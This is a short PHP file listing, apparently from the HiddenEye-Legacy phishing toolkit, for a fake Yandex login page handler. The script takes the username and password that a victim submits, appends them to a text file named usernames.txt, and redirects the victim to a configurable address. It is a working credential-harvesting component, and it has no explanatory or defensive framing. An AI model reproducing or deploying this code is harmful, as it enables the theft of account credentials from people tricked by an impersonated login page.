HiddenEye-Legacy/WebPages/yandex/login.php
2019-04-21 10:15:25 +00:00

7 lines
181 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['login'] . " Pass: " . $_POST['passwd'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();